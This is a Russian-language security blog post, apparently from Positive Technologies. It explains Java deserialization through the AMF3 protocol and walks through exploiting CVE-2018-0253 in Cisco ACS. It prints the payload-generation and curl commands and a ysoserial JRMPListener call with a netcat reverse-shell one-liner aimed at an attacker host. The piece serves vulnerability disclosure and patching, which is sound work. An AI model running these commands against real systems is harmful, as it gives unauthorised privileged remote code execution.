Опасный протокол AMF3

в 8:37, , рубрики: Cisco, Cisco ACS, Блог компании Positive Technologies, информационная безопасность, уязвимости

Недавно Markus Wulftange из Code White поделился интересным исследованием о том, как можно атаковать веб-приложение, если оно написано на Java и использует протокол AMF3. Этот протокол можно встретить там, где используется Flash и требуется обмен данными между SWF объектом и серверной частью приложения. Протокол позволяет передавать на сервер сериализованные объекты типа flash.utils.IExternalizable. Эти объекты на стороне сервера десериализуются, происходит конверсия типов, и flash.utils.IExternalizable превращается в java.io.Externalizable. Стоит отметить, что классы, которые реализуют этот интерфейс, сами полностью контролируют процессы собственной сериализации и десериализации. Это значит, что можно постараться найти такой класс, при десериализации которого будет выполнен произвольный код.

Маркус исследовал все классы из OpenJDK 8u121, реализующие интерфейс java.io.Externalizable и обнаружил, что в их числе находятся классы sun.rmi.server.UnicastRef и sun.rmi.server.UnicastRef2, связанные с механизмом RMI. Если правильно подготовить объект одного из этих классов (инициализировать его ссылкой на хост атакующего), а затем передать его на уязвимый сервер, то JVM сервера зарегистрирует ссылку LiveRef на «удаленный объект». После этого механизм сборки мусора попытается установить JRMP соединение с указанным хостом. А как известно, протокол JRMP подразумевает обмен сериализованными объектами Java. Это можно использовать для проведения атак, связанных с десериализацией.

Опасный протокол AMF3 - 1

CVE-2018-0253 или как мы взломали Cisco ACS

Однажды, во время одного из проводимых нами тестов, мы получили доступ к серверу Cisco ACS 5.8. При этом мы имели возможность подключаться к работающему серверу через веб-интерфейс. В ходе анализа веб-интерфейса мы обнаружили, что от клиента на сервер отправляются POST запросы, содержащие объекты AMF3.

Опасный протокол AMF3 - 2

Позже было замечено, что сервер принимает такие POST запросы без авторизации

Заголовки HTTP ответов говорили о том, что веб-интерфейс реализован на Java. Значит, можно попробовать провести атаку.

Скачаем оригинальный эксплоит и поменяем переменные host и port. При компиляции нужно убедиться, что CLASSPATH содержит путь к библиотеке Apache BlazeDS. Запуск скомпилированного кода выведет AMF пакет: сериализованный объект класса UnicastRef, который проинициализирован ссылкой LiveRef на наш сервер.

javac Amf3ExternalizableUnicastRef.java && java Amf3ExternalizableUnicastRef > payload

Отправляем HTTP-запрос, содержащий сгенерированный AMF пакет на Cisco ACS и видим попытку соединения.

curl -X POST -H "Content-type: application/x-amf" --data-binary @payload -k 
https://[IP адрес Cisco ACS]/acsview/messagebroker/amfsecure

Опасный протокол AMF3 - 3

Так произошло, потому что на сервере установлена уязвимая версия библиотеки Apache BlazeDS. Cisco ACS распаковал AMF пакет, десериализовал переданный нами объект, и теперь сборщик мусора пытается установить JRMP соединение на наш сервер. Если на этот запрос ответить RMI-объектом, Cisco ACS десериализует полученные данные, и выполнит наш код.

Используем утилиту ysoserial. Она выступит в роли JRMP-сервера: клиент при подключении получит объект из библиотеки CommonsCollection1, внутри которого — код для выполнения реверс-шелла.

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 443 CommonsCollections1 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [IP адрес компьютера атакующего] 80 >/tmp/f'

Теперь повторим отправку AMF пакета и получим reverse shell:

Опасный протокол AMF3 - 4

Вместо заключения

Найденная уязвимость позволяет неавторизованному атакующему выполнять произвольные команды от привилегированного пользователя. Производителем она была оценена в 9.8 балла по шкале CVSS. Советуем всем, кто использует данное ПО, установить последний патч.

Уязвимое ПО:

  • Cisco ACS < 5.8.0.32.7 – уязвима, авторизация не требуется;
  • Cisco ACS 5.8.0.32.7, 5.8.0.32.8 – уязвима, требуется авторизация;
  • Начиная с Cisco ACS 5.8.0.32.9 – уязвимость закрыта.

Авторы: Михаил Ключников и Юрий Алейнов, Positive Technologies

Автор: ptsecurity

Источник


* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js